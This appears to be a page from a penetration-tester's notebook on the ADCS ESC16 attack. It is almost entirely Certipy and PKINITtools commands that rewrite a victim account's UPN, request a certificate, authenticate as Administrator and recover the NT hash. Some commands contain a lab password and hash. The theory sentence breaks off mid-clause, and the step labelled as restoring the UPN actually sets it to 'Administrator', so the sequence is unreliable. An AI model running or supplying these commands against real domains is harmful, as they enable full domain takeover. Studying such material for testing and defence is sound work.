ADCS - ESC16

PRIMARY CATEGORY → ADCS

Theory

This attack leverages the absence of the security extension on the CA, which allows the DC

Abuse - UNIX-Like

In order to accomplish this task, an operator must have control over a domain account which has GenericWrite, GenericAll, WriteDACL or WriteProperty (UPN atrribute) on another domain account

Checking UPN for the vulnerable user

Certipy

Certipy

certipy account -dc-ip '<DC>' -username '<CONTROLLED_ACCOUNT>' -password '<PASSWD>' -user '<VULNERABLE_USER>' read

Updating Vulnerable User’s UPN

Certipy

certipy account -dc-ip '<DC>' -username '<USER>' -password '<PASSWD>' -user '<VULNERABLE_USER>' -upn '<UPN>' update

Requesting the Certificate to the CA

Certipy

certipy req -dc-ip 10.129.232.88 -username 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -ca 'fluffy-DC01-CA' -template 'User'

Restoring the Original Value of the UPN Attribute

Certipy

certipy account -dc-ip 10.129.232.88 -username 'p.agila' -password 'prometheusx-303' -user 'ca_svc' -upn 'Administrator' update

Passing-the-certificate + Unpac-the-hash as the Domain Administrator User

Certipy

certipy auth -dc-ip 10.129.232.88 -user 'Administrator' -domain 'fluffy.htb' -pfx administrator.pfx

PKINITtools

PKINITtools

PtC

GetTGTPkinit.py

python3 gettgtpkinit.py -dc-ip '<DC>' -cert-pfx '<PFX_CERT>' '<DOMAIN>/Administrator' 'Administrator.ccache'

Unpac the Hash

GetNTHash.py

export KRB5CCNAME=$( realpath '<CCACHE_FILE>' )

python3 getnthash.py -dc-ip '<DC>' -key '<AS_KEY>' '<DOMAIN>/Administrator'

💥Cyb3rBook

Explorer

ADCS - ESC16

PRIMARY CATEGORY → ADCS

Theory

Abuse - UNIX-Like

Checking UPN for the vulnerable user

Certipy

Updating Vulnerable User’s UPN

Certipy

Requesting the Certificate to the CA

Certipy

Restoring the Original Value of the UPN Attribute

Certipy

Passing-the-certificate + Unpac-the-hash as the Domain Administrator User

Certipy

PKINITtools

Graph View

Table of Contents

Backlinks